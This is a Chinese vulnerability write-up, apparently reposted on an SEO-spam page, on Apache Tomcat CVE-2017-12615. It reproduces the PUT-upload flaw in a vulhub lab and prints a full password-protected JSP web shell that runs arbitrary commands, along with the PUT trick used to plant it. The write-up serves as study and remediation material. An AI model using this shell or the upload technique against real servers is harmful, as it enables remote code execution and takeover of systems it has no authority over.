当前位置: 首页 > news >正文

九一制作厂网站信息流广告模板

九一制作厂网站,信息流广告模板,重庆荣昌网站建设,小程序免费制作平台有哪些漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,…

漏洞简介

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。

漏洞原理

org.apache.jasper.servlet.JspServlet:默认处理jsp,jspx文件请求,不存在PUT上传逻辑,无法处理PUT请求
org.apache.catalina.servlets.DefaultServlet:默认处理静态文件(除jsp,jspx之外的文件),存在PUT上传处理逻辑,可以处理PUT请求。
所以即使可以PUT一个文件到服务器但也无法直接PUT以jsp,jspx结尾文件,因为这些这些后缀的文件都是交由JspServlet处理的,它没法处理PUT请求。
但是当利用Windows特性绕过文件名检测机制时,tomcat并不认为其是jsp文件从而交由DefaultServlet处理,从而成功创建jsp文件

影响版本

Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)

漏洞复现

环境搭建

cd /vulhub/tomcat/CVE-2017-12615
docker-compose up -d

在这里插入图片描述

漏洞验证

原始数据包如下
在这里插入图片描述
将GET修改为PUT,并填写内容(这里解析没成功,改成了/1.jsp/)
在这里插入图片描述
进入容器,发现上传成功
在这里插入图片描述
若从浏览器访问返回Hello,则证明漏洞存在
在这里插入图片描述

漏洞利用

将exp写入jsp并上传

<%@ page language="java" contentType="text/html; charset=GBK"pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>一句话木马</title></head><body><%if ("admin".equals(request.getParameter("pwd"))) {java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int len = -1;byte[] bytes = new byte[4092];out.print("<pre>");while ((len = input.read(bytes)) != -1) {out.println(new String(bytes, "GBK"));}out.print("</pre>");}%></body>
</html>

在这里插入图片描述
访问即可命令执行
在这里插入图片描述

修复建议

升级版本
开启readonly

http://www.mmbaike.com/news/99251.html

相关文章:

  • 海南省住房和城乡建设厅官方网站百度文库官网入口
  • 今傲网站做的怎么样搜索引擎平台有哪些
  • 投票网站开发的背景和意义网站流量统计工具
  • h5网站制作网站开发网络推广公司收费标准
  • 苏宁易购电商网站建设需求分析谷歌搜索引擎官网
  • 重庆快速网站建设传统营销
  • 搞一个卖东西的网站怎么做武汉网站维护公司
  • 网站建设与维护高职旺道seo软件
  • 做网站怎么搭建环境近期国内新闻摘抄
  • 竞价推广是什么工作杭州网站排名seo
  • wordpress模板图片不显示网站按天扣费优化推广
  • 百度网址大全网站廊坊百度快照优化排名
  • 凯里有哪些网站开发公司seo网络推广哪家专业
  • 西安网站建设公司排seo查询爱站网
  • 网站优化 前端怎么做广告seo是什么意思
  • 珠宝 网站模板长春关键词优化排名
  • 做网彩网站公司网站推广怎么做
  • 制作公司网站要多少钱搜索引擎优化培训班
  • 书画院网站建设方案域名停靠网页app推广大全
  • 网站建设服务怎么样爱网站查询挖掘工具
  • 盐田高端网站建设浙江企业seo推广
  • 做网站尺寸一般都多大谷歌google中文登录入口
  • 新闻网站规划建设整合营销传播的定义
  • 南京文化云网站建设中国大数据平台官网
  • 珍岛做网站怎么样重庆搜索排名提升
  • 网站设计培训课程重庆快速排名优化
  • 学院管理网站建设建立网站的步骤
  • 上海网站建设基础网络销售平台上市公司有哪些
  • 宜昌做网站的百度公司招聘条件
  • 支付网站建设费用做账seo学徒招聘